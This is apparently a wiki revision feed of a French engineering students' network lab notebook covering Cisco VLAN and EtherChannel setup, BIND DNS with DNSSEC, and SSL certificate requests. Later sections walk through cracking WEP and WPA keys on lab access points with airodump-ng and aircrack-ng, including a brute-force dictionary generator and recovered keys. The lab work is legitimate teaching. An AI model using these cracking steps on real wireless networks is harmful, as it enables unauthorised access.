'''DNS1''' : ns.bielloumutherfucker.space&lt;br /&gt;
&lt;br /&gt;
'''DNS2''' : ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier ''/etc/bind'' de notre machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
Nous modifions dans un premier temps le fichier ''named.conf.local'' afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;bielloumutherfucker.space&amp;quot; {&lt;br /&gt;
 type master;&lt;br /&gt;
 FIle &amp;quot;/etc/bind/zones/db.bielloumutherfucker.space&amp;quot;;&lt;br /&gt;
 allow-transfer {217.70.177.40; };&lt;br /&gt;
 notify yes;	&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
nous créons ensuite un dossier ''zones'' à l'intérieur duquel nous créons notre fichier de zone ''db.bielloumutherfucker.space'' :&lt;br /&gt;
&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.bielloumutherfucker.space. root.bielloumutherfucker.space. (&lt;br /&gt;
                    2015102001         ; Serial&lt;br /&gt;
                         86400         ; Refresh&lt;br /&gt;
                          3600         ; Retry&lt;br /&gt;
                       2419200         ; Expire&lt;br /&gt;
                         86400 )       ; Negative Cache TTL&lt;br /&gt;
 &lt;br /&gt;
 @       IN      NS      ns.bielloumutherfucker.space.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns      IN      A       193.48.57.167&lt;br /&gt;
 www     IN      A       193.48.57.167&lt;br /&gt;
 @	IN	A	193.48.57.167&lt;br /&gt;
&lt;br /&gt;
Il nous faut ensuite modifier notre fichier ''/etc/resolv.conf'' afin de passer par notre serveur :&lt;br /&gt;
&lt;br /&gt;
 search bielloumutherfucker.space&lt;br /&gt;
 nameserver 193.48.57.167&lt;br /&gt;
&lt;br /&gt;
A partir de ce moment là, notre serveur DNS est opérationnel. Il nous faut maintenant le sécuriser grâce à DNSSEC.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, il nous faut générer les clefs asymétriques KSK et ZSK. Nous entrons alors les commandes suivantes dans le terminal :&lt;br /&gt;
&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -f KSK -b 2048 -r /dev/urandom -n ZONE bielloumutherfucker.space --&amp;gt; clef KSK&lt;br /&gt;
 dnssec-keygen -a RSASHA1 --b 1024 -r /dev/urandom -n ZONE bielloumutherfucker.space --&amp;gt; clef ZSK&lt;br /&gt;
&lt;br /&gt;
Nous avons maintenant 4 clefs : deux pour chaque type de clef (KSK ou ZSK) avec deux extention différentes (.key pour la clef publique, .private pour la privée).&lt;br /&gt;
&lt;br /&gt;
Après les avoir placé dans le répertoire ''bielloumutherfucker.space.dnssec'' que nous avons crée, on les renomme selon le schéma suivant :&lt;br /&gt;
&lt;br /&gt;
 bielloumutherfucker.space-ksk.key et bielloumutherfucker.space-ksk.private&lt;br /&gt;
 bielloumutherfucker.space-zsk.key et bielloumutherfucker.space-zsk.private&lt;br /&gt;
&lt;br /&gt;
Nous pouvons maintenant signer la zone à l'aide de la commande suivante (depuis le dossier /etc/bind) :&lt;br /&gt;
&lt;br /&gt;
 dnssec-signzone -o bielloumutherfucker.space -k bielloumutherfucker.space-ksk &lt;br /&gt;
 zones/db.bielloumutherfucker.space bielloumutherfucker.space-zsk&lt;br /&gt;
&lt;br /&gt;
Une nouvelle zone, signée, a donc été créée dans notre dossier ''zones''. Il ne nous reste plus qu'à modifier le fichier ''named.conf.local'' en rajoutant un ''.signed'' à la fin du champ File pour notre zone. Nous redémarrons ensuite le serveur bind.&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Nous retournons sur le site de gandi et dans la rubrique ''gérer DNSSEC'' nous ajoutons notre clef publique avec l'algorithme ''RSASHA1''. Une fois la clef ajoutée sur gandi, on peut voir que tous s'est bien passé en faisant un tour sur le site ''Zone Master'', l'attribut DNSSEC est en effet coché et vert.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:dnssec.png]]&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du site via certificat SSL===&lt;br /&gt;
&lt;br /&gt;
Il faut dans un premier temps générer la clefs CSR que nous donnerons à Gandi.&lt;br /&gt;
&lt;br /&gt;
 root@Ironman:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout Ironman.key -out Ironman.csr&lt;br /&gt;
 Generating a 2048 bit RSA private key&lt;br /&gt;
 ..................................................................+++&lt;br /&gt;
 .........................................+++&lt;br /&gt;
 writing new private key to 'Ironman.key'&lt;br /&gt;
 -----&lt;br /&gt;
 You are about to be asked to enter information that will be incorporated&lt;br /&gt;
 into your certificate request.&lt;br /&gt;
 What you are about to enter is what is called a Distinguished Name or a DN.&lt;br /&gt;
 There are quite a few fields but you can leave some blank&lt;br /&gt;
 For some fields there will be a default value,&lt;br /&gt;
 If you enter '.', the field will be left blank.&lt;br /&gt;
 -----&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:Nord &lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:bielloumutherfucker.space&lt;br /&gt;
 Email Address []:&lt;br /&gt;
 Please enter the following 'extra' attributes&lt;br /&gt;
 to be sent with your certificate request&lt;br /&gt;
 A challenge password []:&lt;br /&gt;
 An optional company name []:&lt;br /&gt;
&lt;br /&gt;
A partir de ce moment là, ls clefs ont été générées : &lt;br /&gt;
 &lt;br /&gt;
 root@Ironman:/etc/apache2/sites-available/clef# ls&lt;br /&gt;
 Ironman.csr  Ironman.key&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Et nous pouvons donner la CSR à Gandhi afin d'activer la procédure d'activation.&lt;br /&gt;
&lt;br /&gt;
De façon à recevoir le mail sur admin@bielloumutherfucker.space, nous devons modifier le fichier /etc/aliases et y rajouter la ligne suivante:&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 admin: root&lt;br /&gt;
&lt;br /&gt;
===Crackage de clé WEP===&lt;br /&gt;
&lt;br /&gt;
Afin de cracker les clés WEP, nous avons d'abord recherché toutes les points d'accès Wifi disponible autour de nous et possédant une clé WEP.&lt;br /&gt;
Pour cela, nous avons utilisé la commande : airodump-ng --encrypt wep wlan2&lt;br /&gt;
&lt;br /&gt;
On obtient l'écran suivant :&lt;br /&gt;
&lt;br /&gt;
 CH 12 ][ Elapsed: 0 s ][ 2016-03-31 20:22                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:CF:01:94  -74        0        0    0  -1  -1                    PolytechLille                                              &lt;br /&gt;
 04:DA:D2:9C:50:57  -62        1        6    2   2  54e. WEP  WEP         cracotte08                                                 &lt;br /&gt;
 04:DA:D2:9C:50:56  -67        2        0    0   2  54e. WEP  WEP         cracotte07                                                 &lt;br /&gt;
 04:DA:D2:9C:50:54  -66        1        5    2   2  54e. WEP  WEP         cracotte05                                                 &lt;br /&gt;
 04:DA:D2:9C:50:52  -63        1       80   38   2  54e. WEP  WEP         cracotte03                                                  &lt;br /&gt;
 04:DA:D2:9C:50:53  -61        0       24   11   2  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                                                &lt;br /&gt;
 04:DA:D2:9C:50:55  -68        1       14    6   2  54e. WEP  WEP         cracotte06                                                 &lt;br /&gt;
 04:DA:D2:9C:50:50  -60        0       73   35   2  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                                               &lt;br /&gt;
 04:DA:D2:9C:50:51  -63        1       52   25   2  54e. WEP  WEP         cracotte02                                                 &lt;br /&gt;
 44:AD:D9:5F:87:00  -42        3        1    0   3  54e. WEP  WEP40       Wolverine                                                  &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                            &lt;br /&gt;
                                                                                                                                      &lt;br /&gt;
 04:DA:D2:CF:01:94  00:0C:E7:91:C1:7D  -56    1e- 1e     0       13                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -68   54e-11e    15        5                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -72   36e- 5e     0        7                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -60   54e-48e    79       81                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:53  00:0F:B5:92:22:68  -64   48e-54e   111       24                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -66    0 -48e   128       13                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:50  00:0F:B5:92:23:75  -62   54e-54e    92       75                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:51  00:0F:B5:92:24:51  -60   48e-48e    63       53                                                                   &lt;br /&gt;
 (not associated)   9C:2A:83:45:F0:2D  -80    0 - 1      0        1                                                                   &lt;br /&gt;
 (not associated)   8A:1B:9C:B1:EC:8C  -70    0 - 1      5        2                                                                   &lt;br /&gt;
 44:AD:D9:5F:87:00  AC:5F:3E:59:90:D5  -40    0 - 1      0        2&lt;br /&gt;
&lt;br /&gt;
Nous avons choisit de cracker cracotte06. Nous avons créé un fichier de capture (.cap) ciblant cracotte06 grâce à la commande :&lt;br /&gt;
 airodump-ng -w cracotte06 -c 2 --bssid 04:DA:D2:9C:50:55 wlan2&lt;br /&gt;
&lt;br /&gt;
On obtient l'écran suivant :&lt;br /&gt;
&lt;br /&gt;
 CH  2 ][ Elapsed: 8 s ][ 2016-03-31 20:30                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:55  -64   0       59      770   64   2  54e. WEP  WEP         cracotte06                                             &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -68    6e-54e  5108      718 &lt;br /&gt;
&lt;br /&gt;
Une fois le fichier de capture créé, nous avons exécuter la commande &lt;br /&gt;
&lt;br /&gt;
 aircrack cracotte06-01.cap&lt;br /&gt;
&lt;br /&gt;
afin débuter le crackage de la clé WEP.&lt;br /&gt;
&lt;br /&gt;
On obtient le résultat suivant en quelques minutes :&lt;br /&gt;
&lt;br /&gt;
                 [00:01:53] Tested 279622 keys (got 31535 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(44544) A1(39936) 55(39168) BA(38400) E2(37632) &lt;br /&gt;
    1    0/  1   EE(47872) 79(37888) 0E(37120) C0(37120) 37(36864) &lt;br /&gt;
    2    0/  1   EE(43008) 83(40448) 2B(39680) B2(39680) 3F(38912) &lt;br /&gt;
    3    0/  1   EE(46592) 8E(38656) 30(37888) 0A(37120) 86(37120) &lt;br /&gt;
    4    0/  1   EE(46336) C2(39168) 5D(38912) 89(38400) 1B(38144) &lt;br /&gt;
    5    0/  1   EE(50176) CB(41472) C5(39936) 35(39168) 3C(38656) &lt;br /&gt;
    6    0/  1   EE(41216) 0C(39936) AB(37888) B1(37888) DE(37120) &lt;br /&gt;
    7    0/  2   EE(41472) 38(40960) D6(39168) 9F(38400) C4(37888) &lt;br /&gt;
    8    0/  1   EE(39936) 99(38656) 11(38400) FD(38400) E6(37632) &lt;br /&gt;
    9    0/  3   7C(38912) 05(38400) 4C(38400) C1(38144) 22(37888) &lt;br /&gt;
   10    0/  1   D1(38144) 42(37632) 99(37632) 9D(37632) 94(37376) &lt;br /&gt;
   11    1/  1   A0(38912) 2B(38656) 65(37888) E8(37888) A9(37632) &lt;br /&gt;
   12    0/  1   44(43740) 35(38548) A7(38252) 3A(37560) 88(37560) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
La clé a été trouver et sa valeur est &amp;quot;EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44&amp;quot;&lt;br /&gt;
&lt;br /&gt;
===Craquage de clé WPA===&lt;br /&gt;
&lt;br /&gt;
Le craquage d'une clé WPA est beaucoup plus long que celui d'une clé WEP car le crack doit effectuer un test sur tout les nombres à 8 chiffres jusqu'à arriver au mot de passe de la borne Wifi. C'est un crack en force brute.&lt;br /&gt;
&lt;br /&gt;
Nous avons donc tout d'abord génerer un fichier texte contenant tout les nombres à 8 chiffres (de 00000000 à 99999999) grâce au petit programme c suivant :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #define MAX_NUM 99999999&lt;br /&gt;
&lt;br /&gt;
 int main(){&lt;br /&gt;
 long chiffre = 0;&lt;br /&gt;
 FILE* fp = NULL;&lt;br /&gt;
 fp = fopen(&amp;quot;dictionnaire.txt&amp;quot;,&amp;quot;a+&amp;quot;);&lt;br /&gt;
 	if (fp != NULL){&lt;br /&gt;
 		for (chiffre=0;chiffre&amp;lt; MAX_NUM + 1;chiffre++)&lt;br /&gt;
 		{&lt;br /&gt;
 		fprintf(fp,&amp;quot;%08li\n&amp;quot;,chiffre);&lt;br /&gt;
 		}&lt;br /&gt;
 	fclose(fp);&lt;br /&gt;
 	}&lt;br /&gt;
 return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
Une fois le dictionnaire généré, on effectue la même commande qu'avec le crackage WEP mais pour les clés WPA : &lt;br /&gt;
&lt;br /&gt;
1. On bascule l'interface wifi en mode monitor :&lt;br /&gt;
 airmon-ng start wlan2&lt;br /&gt;
&lt;br /&gt;
2. On fait un airodump-ng de tout les réseaux possédant un chiffrage WPA :&lt;br /&gt;
 airodump-ng --encrypt WPA wlan2&lt;br /&gt;
&lt;br /&gt;
On obtient le résultat suivant :&lt;br /&gt;
&lt;br /&gt;
 00:19:07:C5:0F:A4  -44        7        8    2   1  54e. WPA2 CCMP   MGT  PolytechLille                                              &lt;br /&gt;
 00:19:07:C5:0F:A2  -48        5        0    0   1  54e. WPA2 CCMP   PSK  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 00:19:07:C5:0F:A5  -48        6        0    0   1  54e. WPA2 CCMP   PSK  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 00:19:07:C5:0F:A3  -50        7        0    0   1  54e. WPA2 CCMP   PSK  PolytechGuests                                             &lt;br /&gt;
 00:19:07:C5:0F:A1  -50        7        0    0   1  54e. WPA2 CCMP   MGT  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 00:19:07:C5:0F:A7  -52        6        0    0   1  54e. WPA2 CCMP   MGT  PolytechLilleStaff                                         &lt;br /&gt;
 00:19:07:C5:0F:A6  -52        5        0    0   1  54e. WPA2 CCMP   MGT  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 00:19:07:C5:0F:A0  -54        6        2    0   1  54e. WPA2 CCMP   MGT  LILLE1                                                     &lt;br /&gt;
 00:19:07:C5:0F:A8  -55        5        5    0   1  54e. WPA2 CCMP   MGT  eduroam                                                    &lt;br /&gt;
 04:DA:D2:9C:50:53  -62        5        0    0  13  54e. WPA2 CCMP   PSK  cracotte04                                                 &lt;br /&gt;
 04:DA:D2:9C:50:52  -66        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte03                                                 &lt;br /&gt;
 04:DA:D2:9C:50:58  -66        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte09                                                 &lt;br /&gt;
 04:DA:D2:9C:50:50  -66        5        0    0  13  54e. WPA2 CCMP   PSK  cracotte01                                                 &lt;br /&gt;
 04:DA:D2:9C:50:55  -65        6        0    0  13  54e. WPA2 CCMP   PSK  cracotte06                                                 &lt;br /&gt;
 04:DA:D2:9C:50:56  -65        3        0    0  13  54e. WPA2 CCMP   PSK  cracotte07                                                 &lt;br /&gt;
 04:DA:D2:9C:50:59  -67        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte10                                                 &lt;br /&gt;
 04:DA:D2:9C:50:54  -67        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte05                                                 &lt;br /&gt;
 04:DA:D2:9C:50:57  -66        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte08                                                 &lt;br /&gt;
 04:DA:D2:9C:50:51  -67        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte02                                                 &lt;br /&gt;
 04:DA:D2:CF:01:91  -69        2        0    0   5  54e. WPA2 CCMP   MGT  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 C8:00:84:84:00:53  -70        3        0    0   9  54e. WPA2 CCMP   PSK  PolytechGuests                                             &lt;br /&gt;
 C8:00:84:84:00:52  -71        4        0    0   9  54e. WPA2 CCMP   PSK  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 04:DA:D2:CF:01:98  -70        2        0    0   5  54e. WPA2 CCMP   MGT  eduroam                                                    &lt;br /&gt;
 04:DA:D2:CF:01:90  -71        3        0    0   5  54e. WPA2 CCMP   MGT  LILLE1                                                     &lt;br /&gt;
 04:DA:D2:CF:01:95  -72        2        0    0   5  54e. WPA2 CCMP   PSK  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 04:DA:D2:CF:01:97  -72        2        0    0   5  54e. WPA2 CCMP   MGT  PolytechLilleStaff                                         &lt;br /&gt;
 04:DA:D2:CF:01:96  -72        2        0    0   5  54e. WPA2 CCMP   MGT  &amp;lt;length:  1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
3. Nous décidons de cracker cracotte09, on lance un airodump sur son essid et on effectue une capture &lt;br /&gt;
 &lt;br /&gt;
 airodump-ng -w cracotte09 --encrypt wpa -c 13 -essid cracotte09 wlan05&lt;br /&gt;
&lt;br /&gt;
4. On lance le aircrack avec le fichier de capture et notre dictionnaire généré précédemment :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w dictionnaire.txt cracotte09-01.cap&lt;br /&gt;
&lt;br /&gt;
5. Au bout de 57:55 minutes, nous avons obtenu la clé suivante :&lt;br /&gt;
&lt;br /&gt;
passphrase : 12399909&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B07&amp;diff=35466</id>
		<title>Cahier 2016 groupe n°7</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B07&amp;diff=35466"/>
				<updated>2016-11-28T13:10:38Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Cahier des charges==&lt;br /&gt;
&lt;br /&gt;
Mise en réseau des commutateurs 6006 en E304&lt;br /&gt;
&lt;br /&gt;
==Avancement du travail==&lt;br /&gt;
&lt;br /&gt;
===Configuration du 6006===&lt;br /&gt;
&lt;br /&gt;
-Création de 10 VLAN (vlans 2 à 11)pour chacun des 10 groupes du TP sur les ports 4/1 à 4/10 &lt;br /&gt;
&lt;br /&gt;
-Création d'un VLAN (vlan 12) pour les machines virtuelles sur le port 4/11&lt;br /&gt;
&lt;br /&gt;
-Création de 4 ports Trunk sur les ports 4/48, 5/48, 6/48, 7/48 pour respectivement le routeur E304, le routeur E306, le bounding linux et la borne WiFi.&lt;br /&gt;
&lt;br /&gt;
La suite de commande Cisco pour configurer le vlan x avec le nome nameX est la suivante :&lt;br /&gt;
&lt;br /&gt;
 1 Switch-E304&amp;gt;enable&lt;br /&gt;
 2 Switch-E304#vlan database&lt;br /&gt;
 3 Switch-E304(vlan)#vlan x name nameX&lt;br /&gt;
 4 Switch-E304(vlan)#exit&lt;br /&gt;
&lt;br /&gt;
La suite de commande pour configurer le port 4/x en mode accès sur le vlan x est la suivante :&lt;br /&gt;
&lt;br /&gt;
 1 Switch-E304&amp;gt;enable&lt;br /&gt;
 2 Switch-E304#conf t&lt;br /&gt;
 3 Switch-E304(config)#interface GigabitEthernet 4/x&lt;br /&gt;
 4 Switch-E304(config-if)#switchport&lt;br /&gt;
 5 Switch-E304(config-if)#switchport access vlan x&lt;br /&gt;
 6 Switch-E304(config-if)#no shutdown&lt;br /&gt;
 7 Switch-E304(config-if)#end&lt;br /&gt;
 8 Switch-E304#write memory (enregistrer la configuration)&lt;br /&gt;
&lt;br /&gt;
Pour configurer les ports trunk, il suffit de remplacer la ligne 5 précédente par :&lt;br /&gt;
&lt;br /&gt;
 5 Switch-E304(config-if)#switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
===Installation de xen===&lt;br /&gt;
&lt;br /&gt;
  xen-create-image --hostname=Ironman --ip=193.48.57.167 --netmask=255.255.255.240 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie &lt;br /&gt;
  --dir=/usr/local/xen --gateway=193.48.57.172&lt;br /&gt;
&lt;br /&gt;
===Configuration d'une EtherChannel===&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré une Etherchannel entre notre commutateur et notre routeur. Cela vise à remplacer la liaison trunk simple Gigabit qui les lie déjà, en une liaison 8gigabit. Nous remplacerons donc le port 4/48 par les ports 4/25 à 4/32.&lt;br /&gt;
&lt;br /&gt;
Voici la commande à rentrer dans l'interface de configuration du commutateur :&lt;br /&gt;
&lt;br /&gt;
 1 Switch-E304&amp;gt;enable&lt;br /&gt;
 2 Switch-E304#conf t&lt;br /&gt;
 3 Switch-E304(config)#interface range GigabitEthernet 4/25 - 32&lt;br /&gt;
 4 Switch-E304(config-if)#switchport&lt;br /&gt;
 5 Switch-E304(config-if)#switchport mode trunk&lt;br /&gt;
 6 Switch-E304(config-if)#channel-protocol lacp&lt;br /&gt;
 7 Switch-E304(config-if)#channel-group 1 mode passive&lt;br /&gt;
 8 Switch-E304(config-if)#no shutdown&lt;br /&gt;
 9 Switch-E304(config-if)#end&lt;br /&gt;
 10 Switch-E304#write memory (enregistrer la configuration)  &lt;br /&gt;
&lt;br /&gt;
Pareil dans l'interface de configuration du routeur, sauf que ce sera pour les ports 0/1 à 0/8, et que le channel-group sera en mode active.&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS et DNSSEC avec bind===&lt;br /&gt;
&lt;br /&gt;
La première étape consiste à modifier les informations de notre nom de domaine sur le site de Gandi.&lt;br /&gt;
Il faut alors se diriger sur la rubrique :''Gérer les Glue records''.&lt;br /&gt;
A partir de ce moment là, nous sommes libres de donner les informations suivantes à notre nom de domaine :&lt;br /&gt;
&lt;br /&gt;
'''nom du serveur''' : ns.bielloumutherfucker.space&lt;br /&gt;
&lt;br /&gt;
'''IP''' : 193.48.57.167&lt;br /&gt;
&lt;br /&gt;
On peut ensuite modifier les serveurs de nom, toujours sur le site de Gandi, dans la rubrique ''modifier les serveurs DNS'' :&lt;br /&gt;
&lt;br /&gt;
'''DNS1''' : ns.bielloumutherfucker.space&lt;br /&gt;
&lt;br /&gt;
'''DNS2''' : ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier ''/etc/bind'' de notre machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
Nous modifions dans un premier temps le fichier ''named.conf.local'' afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;bielloumutherfucker.space&amp;quot; {&lt;br /&gt;
 type master;&lt;br /&gt;
 FIle &amp;quot;/etc/bind/zones/db.bielloumutherfucker.space&amp;quot;;&lt;br /&gt;
 allow-transfer {217.70.177.40; };&lt;br /&gt;
 notify yes;	&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
nous créons ensuite un dossier ''zones'' à l'intérieur duquel nous créons notre fichier de zone ''db.bielloumutherfucker.space'' :&lt;br /&gt;
&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.bielloumutherfucker.space. root.bielloumutherfucker.space. (&lt;br /&gt;
                    2015102001         ; Serial&lt;br /&gt;
                         86400         ; Refresh&lt;br /&gt;
                          3600         ; Retry&lt;br /&gt;
                       2419200         ; Expire&lt;br /&gt;
                         86400 )       ; Negative Cache TTL&lt;br /&gt;
 &lt;br /&gt;
 @       IN      NS      ns.bielloumutherfucker.space.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns      IN      A       193.48.57.167&lt;br /&gt;
 www     IN      A       193.48.57.167&lt;br /&gt;
 @	IN	A	193.48.57.167&lt;br /&gt;
&lt;br /&gt;
Il nous faut ensuite modifier notre fichier ''/etc/resolv.conf'' afin de passer par notre serveur :&lt;br /&gt;
&lt;br /&gt;
 search bielloumutherfucker.space&lt;br /&gt;
 nameserver 193.48.57.167&lt;br /&gt;
&lt;br /&gt;
A partir de ce moment là, notre serveur DNS est opérationnel. Il nous faut maintenant le sécuriser grâce à DNSSEC.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, il nous faut générer les clefs asymétriques KSK et ZSK. Nous entrons alors les commandes suivantes dans le terminal :&lt;br /&gt;
&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -f KSK -b 2048 -r /dev/urandom -n ZONE bielloumutherfucker.space --&amp;gt; clef KSK&lt;br /&gt;
 dnssec-keygen -a RSASHA1 --b 1024 -r /dev/urandom -n ZONE bielloumutherfucker.space --&amp;gt; clef ZSK&lt;br /&gt;
&lt;br /&gt;
Nous avons maintenant 4 clefs : deux pour chaque type de clef (KSK ou ZSK) avec deux extention différentes (.key pour la clef publique, .private pour la privée).&lt;br /&gt;
&lt;br /&gt;
Après les avoir placé dans le répertoire ''bielloumutherfucker.space.dnssec'' que nous avons crée, on les renomme selon le schéma suivant :&lt;br /&gt;
&lt;br /&gt;
 bielloumutherfucker.space-ksk.key et bielloumutherfucker.space-ksk.private&lt;br /&gt;
 bielloumutherfucker.space-zsk.key et bielloumutherfucker.space-zsk.private&lt;br /&gt;
&lt;br /&gt;
Nous pouvons maintenant signer la zone à l'aide de la commande suivante (depuis le dossier /etc/bind) :&lt;br /&gt;
&lt;br /&gt;
 dnssec-signzone -o bielloumutherfucker.space -k bielloumutherfucker.space-ksk &lt;br /&gt;
 zones/db.bielloumutherfucker.space bielloumutherfucker.space-zsk&lt;br /&gt;
&lt;br /&gt;
Une nouvelle zone, signée, a donc été créée dans notre dossier ''zones''. Il ne nous reste plus qu'à modifier le fichier ''named.conf.local'' en rajoutant un ''.signed'' à la fin du champ File pour notre zone. Nous redémarrons ensuite le serveur bind.&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Nous retournons sur le site de gandi et dans la rubrique ''gérer DNSSEC'' nous ajoutons notre clef publique avec l'algorithme ''RSASHA1''. Une fois la clef ajoutée sur gandi, on peut voir que tous s'est bien passé en faisant un tour sur le site ''Zone Master'', l'attribut DNSSEC est en effet coché et vert.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:dnssec.png]]&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du site via certificat SSL===&lt;br /&gt;
&lt;br /&gt;
===Crackage de clé WEP===&lt;br /&gt;
&lt;br /&gt;
Afin de cracker les clés WEP, nous avons d'abord recherché toutes les points d'accès Wifi disponible autour de nous et possédant une clé WEP.&lt;br /&gt;
Pour cela, nous avons utilisé la commande : airodump-ng --encrypt wep wlan2&lt;br /&gt;
&lt;br /&gt;
On obtient l'écran suivant :&lt;br /&gt;
&lt;br /&gt;
 CH 12 ][ Elapsed: 0 s ][ 2016-03-31 20:22                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:CF:01:94  -74        0        0    0  -1  -1                    PolytechLille                                              &lt;br /&gt;
 04:DA:D2:9C:50:57  -62        1        6    2   2  54e. WEP  WEP         cracotte08                                                 &lt;br /&gt;
 04:DA:D2:9C:50:56  -67        2        0    0   2  54e. WEP  WEP         cracotte07                                                 &lt;br /&gt;
 04:DA:D2:9C:50:54  -66        1        5    2   2  54e. WEP  WEP         cracotte05                                                 &lt;br /&gt;
 04:DA:D2:9C:50:52  -63        1       80   38   2  54e. WEP  WEP         cracotte03                                                  &lt;br /&gt;
 04:DA:D2:9C:50:53  -61        0       24   11   2  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                                                &lt;br /&gt;
 04:DA:D2:9C:50:55  -68        1       14    6   2  54e. WEP  WEP         cracotte06                                                 &lt;br /&gt;
 04:DA:D2:9C:50:50  -60        0       73   35   2  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                                               &lt;br /&gt;
 04:DA:D2:9C:50:51  -63        1       52   25   2  54e. WEP  WEP         cracotte02                                                 &lt;br /&gt;
